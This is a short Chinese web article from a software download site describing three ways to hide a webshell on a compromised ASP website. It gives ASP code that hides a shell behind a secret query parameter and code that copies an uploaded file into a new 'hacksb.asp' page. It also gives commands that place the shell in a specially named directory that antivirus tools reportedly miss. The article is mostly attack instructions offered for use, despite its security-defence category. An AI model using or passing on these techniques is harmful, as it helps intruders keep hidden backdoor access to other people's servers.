IT资讯/综合软件下载站!┆ 最新软件 最新文章 最新手机 UFO外星人 网站分类

您当前的位置→图文中心安全防范三种隐藏Webshell的方法

三种隐藏Webshell的方法


2009/8/21  编辑:佚名 来源:本站整理 

作者:普瑞斯特
第一种:
在我们要做手脚的asp文件里加入如下内容
<%if request("action")="ok" then%>
shell代码插在这里
<%end if%>
访问的时候在你作手脚的asp文件后面加上?action=ok,即可

第二种:
在我们要做手脚的asp文件里加入如下内容
<%
on error resume next
strFileName = Request.QueryString("filer")
set objStream = Server.createObject("ABODB.Stream")
objStream.Type = 1
objStream.Open
objStream.LoadFromFile strFileName
objStream.SaveToFile Server.mappath("hacksb.asp"),2
%>
访问的时候在做手脚的asp文件后面加上?filer=xxx,
xxx为你本地上传的一个路径如C:\hacksb.asp,
上传后在做手脚的asp的同文件夹中会自动生成hacksb.asp

第三种:
前提得到system权限,
进入网站目录下一层
mkdir s…
copy hacksb.asp s…/
这样杀毒软件找不到的
访问http://网站/s…/hacksb.asp即可

下一页黑客兵器:选择好你的漏洞扫描工具

相关文章
  • ·[图文]EDIUS打不开jpg的三种解决方法
  • ·[图文]科学家表示这三种疾病目前无药医,最有可能变成全球性流行病!
  • ·[图文]苹果手机屏蔽骚扰短信的三种方法
  • ·[图文]三种辨别iphone6s真伪的详细方式
  • ·[图文]三种删除launchpad软件的方法
  • ·[图文]iPhone微信小视频保存到本地的三种方法
  • ·机甲通过升级会获得哪三种技能?
  • ·病毒造成电脑蓝屏的三种攻击方式
  • 发表评论
    栏目列表
    阅读排行
    网站帮助 - 广告合作 - 下载声明 - 网站地图